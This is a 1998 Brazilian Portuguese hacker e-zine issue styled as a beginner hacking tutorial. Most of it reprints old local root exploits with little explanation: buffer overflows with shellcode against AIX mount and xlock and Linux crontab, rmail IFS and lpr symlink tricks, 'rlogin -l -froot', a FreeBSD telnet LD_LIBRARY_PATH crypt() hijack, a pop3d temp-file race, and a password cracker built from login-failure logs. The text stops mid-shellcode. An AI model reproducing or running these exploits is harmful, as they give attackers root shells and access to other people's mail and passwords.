----------------------------------------------------------------------------- |A nova FW estará em www.geocities.com/ResearchTrangle/Lab/5408/main.html | | | | Fale conosco jocker@angelfire.com | | | ----------------------------------------------------------------------------- #=>-BRASIL<=# ---------------------------- 19/02/98 Abertura 19/02/98 ############ ## ## Fechamento 11/03/98 ## ## ## fuck,fuck ######## ## ## fuck,fuck ## ## ### ## all ## ## ## ## ## constituition ## ###### ###### FUCKER WORLD ----------------------------- TOTAL 110 páginas 238 kb 2.2 revisada número 02 -=-=-=-=-=-=-#fuCKeR WoRlD bEgGinEr hAcKeR tUToRiAl vErSaO FiNaL#=-=-=-=-=-=-= Escrito por Draco Colaboraçao DEAD POOL & Junglle Boy Orgulhosos em sermos brasileiros fuck, fuck, fuck, fuck, fuck, all constituition FUCKER WORLD FUCK USA i hate USA "Os verdadeiros mestres sao aqueles que aprendem e nao os que enssinam" (alguem) >>>>08#@ InTRoDucAo @#80<<<< Ae hlera estamos aqui de novo para começar mais um números de FW Apesar de todas as críticas sugestoes e tudo mais que os manos WWW tem falado do e-zine, apesar de todas as dores de cotovelo e os embalos por ai aqui estamos de novo para a alegria da moçada pois muita gente e eu digo muita gente mesmo gostou do e-zine vieram muitos elogios críticas e toques e nós agradecemos muito a TODOS vc's. Me perguntaram muito o que siginificava quando eu colocava ao lado de algums textos os dizeres. BRAZIL 100% ou fuck, fuck, fuck 100% DARK SIDE BRAZIL. Eu quero dizer que é coisa nossa que estas técnicas ou textos ou programas sao 100% genuinamente brasileiros. Tem umas antas me perguntando quem é o anonymous!!!!!!!!!!!!!! Sinceramente tem ums caras que nao merecem ter um pc. Falou para todos vc's e se deliciem com mais uma ediçao de muitas que estao por vir. Sem me esquecer de AGORA em diante a FW nao será nem é um e-zine mensal e muito menos quinzenal pois vejam só eu estudo ando de skate faço tudo quanto e coisa ESCREVO O E-ZINE dai nao sobra muito tempo entao eu vou lançar o novo número quando? 1- Quando a nova ediçao estiver no minimo com 80 páginas assim eu garanto que o leitor vai ter apenas máterias de qualidade sem me preocupar com o tempo que isto demore o que importa é que as matérias prestem. 2- Alem de ter as 80 páginas ela terá obrigatoriamente no minimo 16 seçoes garantindo assim alem da qualidade de textos a qualidade na quantia e diversidade das matérias. 3-Depois e tudo isto ainda tem que ter pelo menos um raio de um colaborador. Espero que assim vc's leitores possam ler um e-zine de qualidade e nao estas bostas por ai que nao falam de droga nenhuma e só emrolam sem qualidade de textos e muito menos com qualidade de informaçao. Ae hlera me colou uma idéia daquelas bem cabulosas no cranio. Esta menssagem vai para quem manja de hack e para quem escreve algum e-zine de qualquer coisa vírus, hack, phreacker, anarch. Po todos podiam se ajuntar e escrever um único e-zine imagine a qualidade de textos quantia de informaçao com certeza com esta idéia nós poderiamos mudar o nome do nosso tao discriminado hack lá fora!!!!!!!! Esta idéia fica pendente qualquer coisa sobre esta minha idéia se vc escreve um e-zine e gostou e-mail em mim. Espero que isto agrade a TODOS os leitores dúvidas e-mail em mim. =#$8>iNDiCE<8$#= -1-NO >>Draco 0-ThAnK[]'Z >>Draco 1-XPlOit's >>Draco 2-PraTiCas inIcIaIS >>Draco 3-NT >>Draco 4-TeCnIcaS de PrOgrAmaçAo>>Draco 5-PrOgRamAs >>Draco 6-PhReAk >>Draco 7-BoMbAS >>Junglle Boy 8-ViRus >>Draco & DEAD 9-VaLe A pEnA ViSiTAr >>Draco 10-TroJaN >>Draco 11-FTP >>Draco 12-SeGUrANçA >>Draco 13-WaREz >>Draco 14-unIX >>Draco 15-MaIL >>Draco <><><><><><><><><><><><><> -1>>><<*******NO*******>><<<-1 Se deu foi conssumada a grande a MAIOR. Ele se foi mas sua sombra ficou Sua mao se decepou mas a sua sombra se sobrepoem O verbo se conssumou É hlera VooDoo caiu fora da AXUR 05 mas sua vontade está ai e nós estamos desejando toda sorte para ele e a NOVA axur que esta por nascer. Nao nós nao somos paga pau de nimguem aqui é pelo simples fato de o VooDoo ter sido o percursor ou uma espécie do mesmo do hack no pais. Confesso que meio surpreso que quando ele escreveu a primeira AXUR 05 eu fiquei meio atonito nesta epoca eu tinha a ideia de escrever a FW de velho mas faltava a vontade. Posso dizer que de certa forma sentiremos falta pois de certo modo tb somos a sombra do verbo. Que tudo seja conssumado e se depender de nós o HACK numca vai morrer no BRASIL. "Valeu pela ajuda cara contamos com vc o futuro é grande." HACK, HACK, HACK, HACK, HACK 100% UNDERGROUNDO DARK SIDE BRAZIL <><><><><><><><><><><><><> 0=**>>ThAnK[]'Z<<**=0 Agradeço a TODOS e mais uma vez um abraço ao DW que me ajuda pa cacete em tudo que preciso. Valeu Dead e red que garantiram um espaço na page deles para nossas primeiras divulgaçoes do e-zine. Valeu Soul Spy por me aturar toda vez que te chamo pelo icq vc está de parabéns pelo seu excelente trabalho na page sempre querendo brindar o internauta com o que a de melhor em textos hackers. A todos que me viseram rir a beça nestes dias que eu estava mal. Mais um abraçao para a Alanis. Dois abraços para a Taty "TATY TE ADORO". Valeu para Deus que é um cara super gente fina. A minha mae que me fez. Mais um abraço para o filho da puta que nao omiti informaçao. A TODOS que leem este e-zine e que vc's tenham em mente que Hack nao é ser o mal no pc e sim uma arte uma forma de expressar sobre a droga do mundo e a dadiva da vida a vida é uma MERDA mas é a única coisa que vc tem entao viva-a intenssamente! "O pássaro nao faz nada e é tao feliz; Eu faço tudo e sempre cobiço querer fazer mais; Mas o pássaro e tao feliz e nao faz nada mas ele é feliz; Eu faço tudo e sou infeliz, faço tudo que o pássaro nao faz; Quero sua liberdade pássaro sua felicidade; Me libertem me tirem deste mundo máldito daime asas." (Alguem) Com certeza vc's estao se perguntando ""Pq o tio Draco escreveu isto?" Me deu vontade gostei deste poema aliás se acostumem que este é um de muitos que vao rolar por aqui em cada ediçao vou colocra um poema que eu gosto e que eu ache consatrutivo para a cabeça da moçada pq sinceramente esta geraçao é fada só penssa naquela BOSTA de TV onde só passa merda nada de util para sua vida. A tv é um depósito de lixo. MAIS valeu TYPE O NEGATIVE valeu Renato Russo fique com DEUS Valeu Voodoo valeu Green Day, VALEU Ozzy, VALEU esta hlera que me fez MELHOR. <><><><><><><><><><><><><> 1*//XPlOit's\\*1 ********************************************************************** * NOTA: Antes de fechar a ediçao eu passei para um amigo meu esta * * ediçao imcompleta e percebi que a posiçao que ele deu será a de * * muitas pessoas e o seguinte. Tem gente que vai falar "só tem * * estas linhas de comando podres que nao servem para NADA" ai estes * * XPLOITS sao os excenciais que se necessita saber cacete se nao * * prestasse eu nao os colocaria estes, ao longo das ediçoes vou * * colocar mais e mais XPLOITs e nao me venham com esta MERDA de que * * nao serve para NADA que eu vou mandar TOMAR no cú caralho tem gente* * que fala demais e nao faz nada eu nao tenho obrigaçao de fazer uma * * coisa que agrade a GREGOS e TROIANOS eu faço uma coisa interessante* * para ambos e me deu o maior trampo fazer estes XPLOITS entao se * * vc nao GOSTOU PHODASSE. * * FUCK OUT SIDE!!!!!!!! * ********************************************************************** * Aqui estao os adorados e idolatrados Xploit's na minha concepçao depois das drogas dos trojans ou melhor junto com os trojans sao as coisinhas mais cobiçadas da net que eu conheço. Para quem ainda nao foi apresentado para eles Xploit é uma falha ou um erro como que seja chamado é um erro fatal no sistema opera- cional que pode te dar o passwd ler o e-mail dos outros ou ate mesmo um status de root, sysop, super user, admin e toda sorte na frente do pc. A quem odeie os Xploit's mas a verdadeira excencia do hack se resume nestas pequenas maravilhas. Muitos programas se baseiam nestes Xploit's e muito conhecimento se baseia neles por isto é tao necessario saber de sistema operaci- onal. Aqui vai uma lista dos principais sistemas operacionais. Unix Aix Linux Irix ultrix Os2 Sun Existem muitos outros mas dominando ou pelo menos tendo o básico destes é o principal. Para que saber de tantos sistemas? Assim vc podera explorar seus bugs e até quem sabe descobrir um bug e se tornar famoso na NET!!!!!!!!! Se bem que a fama pode ser má! Vou passar algums bugs de Linx, Aix e FBSD. Já vou dizendo desde já pois acho esta história de autoria muito importante. Os textos nao sao meus os devidos autores tem seus nomes ao lado de seu respectivo texto o que eu fiz foi traduzilos para o portugues. Precisamos mobilizar o brasil para que nosso hackers tenham mais cabeça e descubram mais coisas. ------------------------------------------------------------------------------ Bug do e-mail no AIX 3.2 remandado por Andrew Green. ------------------------------------------------------------------------------ E da Universidade do Colorado toda a responsabilidade do texto para use/misuse sao esta informaçoes. Vc vai em: #!/bin/csh # IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994 # Vc precisa dos arquivos. mkdir /tmp/.rmail cd /tmp/.rmail Segue-se as instruçoes: cat <usr cp sh mailsh chmod 2777 mailsh EOF chmod 777 usr ln -s /bin/sh . # Set PATH, IFS, corra para rmail. setenv PATH .:$PATH setenv IFS / echo "cheezy mail hack" | rmail joeuser@nohost.com unsetenv IFS rm -f usr sh # minor cleanup. echo "Attempting to run sgid shell." ./mailsh Andrew Green agreen@bentley.univnorthco.edu ------------------------------------------------------------------------------ Bug do /usr/sbin/mount no Aix 4.2 by George Guninski ------------------------------------------------------------------------------ Este programa tem fins educacionais. Nao o use sem permisao Autor Georgi Guninski O autor nao se responsabiliza por qualquer dano causado direta e indiretamente por este programa. Programa test2 escrito em C ---------------------------Corta */ #include #include #include char prog[100]="/usr/sbin/mount"; char prog2[30]="mount"; extern int execv(); char *createvar(char *name,char *value) { char *c; int l; l=strlen(name)+strlen(value)+4; if (! (c=malloc(l))) {perror("error allocating");exit(2);}; strcpy(c,name); strcat(c,"="); strcat(c,value); putenv(c); return c; } /*The program*/ main(int argc,char **argv,char **env) { /*The code*/ unsigned int code[]={ 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c , 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , 0x7c0903a6 , 0x4e800420, 0x0 }; /* disassembly 7c0802a6 mfspr r0,LR 9421fbb0 stu SP,-1104(SP) --get stack 90010458 st r0,1112(SP) 3c60f019 cau r3,r0,0xf019 --CTR 60632c48 lis r3,r3,11336 --CTR 90610440 st r3,1088(SP) 3c60d002 cau r3,r0,0xd002 --TOC 60634c0c lis r3,r3,19468 --TOC 90610444 st r3,1092(SP) 3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01' 6063696e lis r3,r3,26990 90610438 st r3,1080(SP) 3c602f73 cau r3,r0,0x2f73 60636801 lis r3,r3,26625 3863ffff addi r3,r3,-1 9061043c st r3,1084(SP) --terminate with 0 30610438 lis r3,SP,1080 7c842278 xor r4,r4,r4 --argv=NULL 80410440 lwz RTOC,1088(SP) 80010444 lwz r0,1092(SP) --jump 7c0903a6 mtspr CTR,r0 4e800420 bctr --jump */ #define MAXBUF 600 unsigned int buf[MAXBUF]; unsigned int frame[MAXBUF]; unsigned int i,nop,mn; int max; int QUIET=0; int dobuf=0; char VAR[30]="LC_MESSAGES"; unsigned int toc; unsigned int eco; unsigned int *pt; char *t; int egg=1; int ch; unsigned int reta; /* return address */ int corr=4604; char *args[4]; char *newenv[8]; int justframes=1; int startwith=0; mn=78; max=100; if (argc>1) corr = atoi(argv[1]); pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) ) { perror("Bad parameters"); exit(1); } #define OO 7 *((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff); *((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff); *((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff); *((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) & 0x0000ffff); reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr; for(nop=0;nop #include #include #include extern int execv(); #define MAXBUF 600 unsigned int code[]={ 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c , 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , 0x7c0903a6 , 0x4e800420, 0x0 }; char *createvar(char *name,char *value) { char *c; int l; l=strlen(name)+strlen(value)+4; if (! (c=malloc(l))) {perror("error allocating");exit(2);}; strcpy(c,name); strcat(c,"="); strcat(c,value); putenv(c); return c; } main(int argc,char **argv,char **env) { unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt; int min=100, max=280; unsigned int return_address; char *newenv[8]; char *args[4]; int offset=3200; if (argc==2) offset = atoi(argv[1]); pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; *((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff); *((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff); *((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff); *((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff); return_address=(unsigned)&buf[0]+offset; for(nop=0;nop #include /*Used only for disassembling*/ void sh2() { int junk[0x100]; int s[2]; int toc; int ctr; junk[0x100]=0x11; toc=0xf0192c48; ctr=0xd0024c0c; s[0]=0x2f62696e; s[1]=0x2f736800; execv(&s,0); } /*Used for testing*/ void buggy(char *s) { char a[4]; unsigned int junk[150]; strcpy(a,s); puts("Over"); if(junk[20]) puts("P"); } /*The program*/ main(int argc,char **argv) { unsigned int junk[300]; /*The code*/ unsigned int code[]={ 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x30632c48 , 0x90610440 , 0x3c60d002 , 0x30634c0c , 0x90610444 , 0x3c602f62 , 0x3063696e , 0x90610438 , 0x3c602f73 , 0x30636801 , 0x3863ffff , 0x9061043c , 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , 0x7c0903a6 , 0x4e800420, 0x0 }; /* disassembly 7c0802a6 mfspr r0,LR 9421fbb0 stu SP,-1104(SP) --get some stack 90010458 st r0,1112(SP) 3c60f019 cau r3,r0,0xf019 --CTR changed at runtime 30632c48 ai r3,r3,11336 --CTR changed at runtime should be kludged 90610440 st r3,1088(SP) 3c60d002 cau r3,r0,0xd002 --TOC changed at runtime 30634c0c ai r3,r3,19468 --TOC changed at runtime should be kludged 90610444 st r3,1092(SP) 3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01' 3063696e ai r3,r3,26990 90610438 st r3,1080(SP) 3c602f73 cau r3,r0,0x2f73 30636801 ai r3,r3,26625 3863ffff addi r3,r3,-1 9061043c st r3,1084(SP) --terminate /bin/sh with 0 30610438 ai r3,SP,1080 7c842278 xor r4,r4,r4 --argv=NULL 80410440 lwz RTOC,1088(SP) --prepare to jump 80010444 lwz r0,1092(SP) --jump 7c0903a6 mtspr CTR,r0 4e800420 bctr --jump */ unsigned int buf[600]; unsigned int i,nop,mn; int max; unsigned int toc; unsigned int eco; unsigned int *pt; int carry1=1; int carry2=1; pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; if (argv[3]) carry1=atoi(argv[3]); if (argv[4]) carry2=atoi(argv[4]); max=atoi(argv[1]); if(max==0) max=78; mn=40; if(argv[2]) mn=atoi(argv[2]); *((unsigned short *)code +9)=(unsigned short) (toc & 0x0000ffff); *((unsigned short *)code +7)=carry1+(unsigned short) (( --------------------------------------------------------------------Corta ------------------------------------------------------------------------------ Bug do login no AIX by anonymous ------------------------------------------------------------------------------ Este problema com o login conforme reloga acessando para a conta do root. O problema esta na abilitaçao do login para o comando da linha option -fUSER um -fUSER. Agora quando voce precisa de -fUSER para você logar o programa depende do seu rlogind. Relogando basicamente vem em duas partes. old_style: Relogando, estabilizando conexao, alocando e chamando chamando login com -r. Nao somente para login sobre a linha de comando (exceto com getty, quando usasse os usernames. começando com a-). O programa de logar ira rlogin com protocolo over stin/stuot. new_style: relogando e estabelecendo conexao, alocando e relogando com protocolo. O usuario remoto e autenticado, login esta para autenticar use: login -p -h -f lusername Quando o login nao autenticar use: login -p -h lusername Agora -f expectativas um argumento (getops string f:), você pode especificar "-fuser" para um remoto loginname para isto use login -p -h -flusername E interpretado com um login -p -h -f lusername Quando -f aceitar um argumento. Pode provocar um erro de -f quando nao aceitar o argumento. Aceita o argumento com strcmp ("-f", argv[x]). O melhor soluçao seria fazer o relogin (e telnet negociara um username) usase: login -- username % rlogin localhost -l -froot # whoami root ------------------------------------------------------------------------------ Bug do xlock no AIX 4.x by Beast Master V remandado por George Guninsiki ------------------------------------------------------------------------------ Este xploit engloba /usr/bin/X11/xlock exploit CREDITS:Este codigo é simplesmente uma modificaçao de um xploit remandado por George Guninski este pegara #rootshell# comforme sobreescreve um buffer via $HOME na variavel em 'xlock' Este xploit foi feito para Aix 4.x na plataforma PPC Usase: $ cc -o foo -g aix_xlock.c $ ./foo 3200 # --> nao esqueça de vistar http://www.rootshell.com --> para ficarem melhores :-) ----------------------------Corta #include #include #include extern int execv(); #define MAXBUF 600 unsigned int code[]={ 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c , 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , 0x7c0903a6 , 0x4e800420, 0x0 }; char *createvar(char *name,char *value) { char *c; int l; l=strlen(name)+strlen(value)+4; if (! (c=malloc(l))) {perror("error allocating");exit(2);}; strcpy(c,name); strcat(c,"="); strcat(c,value); putenv(c); return c; } main(int argc,char **argv,char **env) { unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt; int min=200, max=300; unsigned int return_address; char *newenv[8]; char *args[4]; int offset=3200; if (argc==2) offset = atoi(argv[1]); pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; *((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff); *((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff); *((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff); *((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff); return_address=(unsigned)&buf[0]+offset; for(nop=0;nop * http://www.escape.com/~daveg * * */ #include #include #include #include #include #define DEFAULT_OFFSET -1240 #define BUFFER_SIZE 100 /* MAX_TEMPSTR is 100 */ #define HAPPY_FILE "./Window" long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char **argv) { int fd; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; /* * The sscanf line reads for 'name' as %[^ =]. Neither a space, nor * a '=' character appears below */ int i; int ofs = DEFAULT_OFFSET; /* if we have a argument, use it as offset, else use default */ if(argc == 2) ofs = atoi(argv[1]); else if (argc > 2) { fprintf(stderr, "egg [offset]\n"); exit(-1); } /* print the offset in use */ printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (878/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr++ = '='; *ptr++ = 'X'; *ptr++ = '\n'; *ptr = 0; printf("Writing to %s\n", HAPPY_FILE); fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666); write (fd, buff, strlen(buff)); close(fd); execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL); /* Successful completion */ exit(0); } -------------------------------------------------------------Corta ------------------------------------------------------------------------------ Bug do sliplogin no LINUX by anonymous ------------------------------------------------------------------------------ Nos todos sabemos isto você pode passar muitas variaveis para um login no shell quando começamos pelo telnet. Resumindo você precisa do password para um sliplogin account sobre uma caixa de linux, você passa o ENV variables nesta parte. O ataque começa somente usando: ENV='`/evil/command`' telnet telnet> environ export ENV telnet> open targethost Você esta logando regularmente a slip accountn qual executaçao aliplogin um seu login em shell. slip login, na vez, vai para /etc/slip.login shell Comece e expanda ENV para obter o nome que começou o arquivo para usar instataneamente o .bashrc e executar /evil/command. Este é particulamente fácil desde sliplogin vá de login/logout script por de baixo do real e efeito o root na ordem para fazer para manipular as interfaces da rede e as mesas de rotina E fixe a nova versao de sliplogin e passe ou predefina PATH variables quando for em slip.login ou slip.logout. ------------------------------------------------------------------------------ Bug do mailx pop3 mail no LINUX by Dave M. ------------------------------------------------------------------------------- Uma explicaçao sobre o mailx security post, este é um problema com o mktemp() em alguns programas. este e um follow-up para isto demonstramos como atacar em linux slackware 3.0 pop3 mail daemon. Referese ao original mailx post para informaçao sobre segurança em mktemp() Linux's /usr/sbin/in.pop3 comtem um mktemp() na condiçao, exploitable quando pop cliente conecta com a maquina e aponta o password correto para entrar. Nisto você tera leitura do e-mail quando um usuario conecta com um pop client. Program: pop3d (/usr/sbin/in.pop3d) Affected Operating Systems: linux - Slackware 3.0 with pop3d enabled Requirements: account on system, target user uses pop client Temporary Patch: disable pop3d Security Compromise: alguns usuarios com uma conta podem lei o e-mail do usuario que estiver em pop client lendo o e-mail Author: Dave M. (davem@cmu.edu) Synopsis: The predictability of mktemp() is exploited to create the temporary files after the filenames have been determined but before they are actually created, allowing the mail being dumped to those temporary files to be read by the creator of the files. -----------------------Corta pop3d-exploit.c: #include #include #include #include main(int argc, char **argv) { int race; int i; char fname[80], tmpf[80]; /* hold filename */ umask(0); if(argc<1) { printf("pop3 racer\nSyntax: %s process-id\n",argv[0]); return -1; } /* create tmp file to race creating */ strcpy(tmpf,"/tmp/pop3"); for(i=strlen(argv[1]);i<6;i++) strcat(tmpf,"0"); strcat(tmpf,argv[1]); tmpf[9] = 'a'; race = creat(tmpf,S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH); while(1) { rename(tmpf,"/tmp/pop.exploit"); if(rename("/tmp/pop.exploit",tmpf) < 0) { printf("race lost - file created.\n"); /* catch 1/2 the losses */ break; } } } --------------------Corta Program: Any with termination on mktemp() failure Affected Operating Systems: Any with predictable mktemp() return values Requirements: write access to directory temp files written to Security Compromise: denial of service Author: Dave M. (davem@cmu.edu) Synopsis: Many operating systems have an extremely limited temporary file creation algorithm, which results in denial of service attacks on any program that uses them exceedingly easy. ---------------------Corta deny-mktemp.c: /* This programs opens the complete set of temporary files tested with mktemp() for a given template (with 6 X's), usually resulting in the program terminating upon failure to find an open file. In pop3d, this prevents a pop client from reading their mail. Dave M. (davem@cmu.edu) */ #include #include #include #include #include /* template found in program's header file, minus X's */ #define TEMPLATE "/tmp/pop3" main(int argc, char **argv) { long int i,j; char fname[20]; if(argc<2) { printf("Syntax: %s process-id\n"); return -1; } j = strlen(TEMPLATE); strcpy(fname,TEMPLATE); for(i=strlen(argv[1]);i<6;i++) strcat(fname,"0"); strcat(fname,argv[1]); for(i=0;i<26;i++) { fname[j] = 'a' + i; creat(fname,O_WRONLY | O_CREAT); } for(i=0;i<26;i++) { fname[j] = 'A' + i; creat(fname,O_WRONLY | O_CREAT); } for(i=0;i<9;i++) { fname[j] = '0' + i; creat(fname,O_WRONLY | O_CREAT); } } --------------------------------------------Corta ------------------------------------------------------------------------------ Bug do relogin no LINUX e AIX by anonymous ------------------------------------------------------------------------------ : % rlogin haxored.net -l -froot # ------------------------------------------------------------------------------ Bug do box no LINUX by Dave G. ------------------------------------------------------------------------------ Debaixo de Linux. Use esta carta no password e login prompt, e logue para /var/log/messages Eu posso usars este topico entre a morte mas eu vejo este problema em todas caixas de acesso do Linux # Dave G. # 12/06/96 # # http://www.escape.com/~daveg echo Crie um dicionario para /var/log/messages, armazeneo em /tmp/messages.dict.$$ grep "LOGIN FAILURE" /var/log/messages | cut -d',' -f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$$ if [ ! -e ./scrack ] then echo "Creating scrack.c" cat << ! > scrack.c ---------------------------------------Corta #include #include #include #include #define get_salt( d, s ) strncpy( d, s, 2 ) void main(argc,argv) int argc; char **argv; { struct passwd *pwd; FILE *fp; char buff[80], salt[3], *encrypted_string; if ( ( fp = fopen( argv[1], "r" ) ) == NULL ) { fprintf( stderr, "Couldnt find dict file\n" ); exit(1); } while ( fgets( buff, 80, fp ) != NULL ) { setpwent(); buff[strlen(buff)-1]='\0'; while ( ( pwd = getpwent() ) != NULL ) { if ( strcmp( (*pwd).pw_passwd, "*" ) != 0 && ( strlen( (*pwd).pw_passwd ) == 13 ) ) { get_salt(salt, (*pwd).pw_passwd ); encrypted_string = crypt( buff, salt ); if ( strcmp( encrypted_string, (*pwd).pw_passwd ) == 0 ) { fprintf( stdout, "l: %s p: %s\n", (*pwd).pw_name, buff); fflush(stdout); } } } } } -------------------------------------Corta echo "Creating scrack" cc -O6 -fomit-frame-pointer -s -o scrack scrack.cfi ./scrack /tmp/messages.dict.$$ echo /tmp/messages.dict.$$, ./scrack, and ./scrack.c still ------------------------------------------------------------------------------ Bug do login no LINUX by Ken Weaverling Ken Weaverling (weave@hopi.dtcc.edu) from Bugtraq ------------------------------------------------------------------------------ Sabe como você coloca +,- e@ entra em /etc/passwd para incorporar stuff para um NIS map? Você pode logar com este entrada tambem. Mas isto é fácil logar desde mais em /etc/passwd arquivos usando NIS usase: +::::: Um ultima linha Isto é porque apenas desabilita NIS . Você esqueceu para remover estas entradas em /etc/passwd Para fixar coloque um * no password e entre em NIS. Isto previne logar de /etc/passwd mas nao restringe que se incorpore a NIS entradas (um bit inconsistente) exemplo: +:*:::: Ele nao pode testar desde que nao tenha LINUX na maquina mas você pode pegar seu LINUX free desde que tenha um 386 com 4 megas.. Estas sao minhas observaçoes em Slackware 2.3/ Kernal 1.2.13 Eu posso falar este logging e um SW2.3/1.2.13 nao da e ele repugia o login. IF o passwd Entre '+::0:0:::'você pode logar no root via telnet mas e possivel que nao se consiga logar diretamente como root. Use uma entrada '+:*:00:::' algumas pessoas logan mas repugiam a senha do root. ------------------------------------------------------------------------------ Bug do lpr no LINUX by Zygo Blaxell Zygo Blaxell (zblaxell@MIRANDA.UWATERLOO.CA) from Bugtraq ------------------------------------------------------------------------------ lpr(1) usasse para acessar o sistema em determinados diretorios O arquivo é escrito comforme o real uid. Ele assume o arquivo podendo estar umlinkado. O problema esta em lpr(1) pois ele nao checa todos diretorios com o stick bit set (eg. /tmp). [ patch deleted] Oh nao :( O patch nao fixa todo o problema. E inclui um xploit script este vc pode testar fixar com; todos estes dias tenho me empenhado para fazer com lpr e rm. O lpr/lpd code pode estar reescrevendo isto nao é usado para acessar. O controle de acesso pode checar comforme OS, e e o umlink pode estar falando com uid/gid previlegiando lpr. Com a abertura diz-se com lpr. Eu nao sei se este é um bug atual de lpr vc pode saber mandando pintar algum arquivo com lpr -s O problema e este lpr/lpd chamando umlink() com privilegios de super usuario Considere: mkdir /tmp/foobar ln -s /etc/passwd /tmp/foobar lpr big_huge_file lpr -r /tmp/foobar/passwd rm -rf /tmp/foobar ; ln -s /etc /tmp/foobar ou ln -fs /home/private_file /tmp/foobar/passwd # Does this work? /etc/passwd va com tudo. Para acess() cheque estando movendo e fechando o umlink, esta e uma condiçao do code (explicando o xploit pegue e anote 50 linhas de menssagem; essencialmente faça 'stat' faça sobre 30 segundos para executar, e demosntre porque as condiçoes sao más. ------------------------------------------------------------------------------ Bug do login no BSD-net2 by anonymous ------------------------------------------------------------------------------ Problema: Este é um bug na versao NET-net2 em login.c no qual se conssegue estabelecer conexao em estatus de root. static char sccsid[]="@(#)login.c 5.73 (Berkeley) 6/29/91" O bug é este nao resete o login do root antes de um insucesso ao logar como root Para abter isto primeiro uma pessoa tenta logar como root e falha e loga em him/herself, he/she estando um uid em 0! Soluçao : Fixe e adicione a linha rootlogin = 0; Depois o codigo: if (pwd && !rval) break; ------------------------------------------------------------------------------ Bug do Telnet no FREEBSD by anonymous ------------------------------------------------------------------------------ % cp libcrypt.so.2.0 /tmp/ % telnet telnet> env def LD_LIBRARY_PATH /tmp telnet> env exp LD_LIBRARY_PATH telnet> open localhost Holey Unix, Batman! (target.org) login: rewt Password: xxx leet... # ----------------------------Corta _H*/ #include static void just_do_me() { setuid(0); setgid(0); puts ("leet..."); fflush (stdout); sleep (1); execl ("/bin/sh", "yow!", 0); } char * crypt (x,y) char * x; char * y; { just_do_me(); } -----------------------------Corta ------------------------------------------------------------------------------ Xploit do ppp no FREEBSD 2.1.0 by Leshka Zakharoff leshka@leshka.chuvashia.su ------------------------------------------------------------------------------ ----------------------------Corta #include main() { #define length 114 int i; unsigned long start_addr; char home_string[length]; char *env[]={ home_string, NULL }; char code_string[]= { "\xeb\x2a" /* jmp cont */ /* geteip: */ "\x5d" /* popl %ebp */ "\x55" /* pushl %ebp */ "\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */ "\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */ "\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */ "\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */ "\xff\x45\xef" /* incl 0xffffffef(%ebp) */ "\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */ "\xc3" /* ret */ /* 0xffffffe0(%ebp): */ 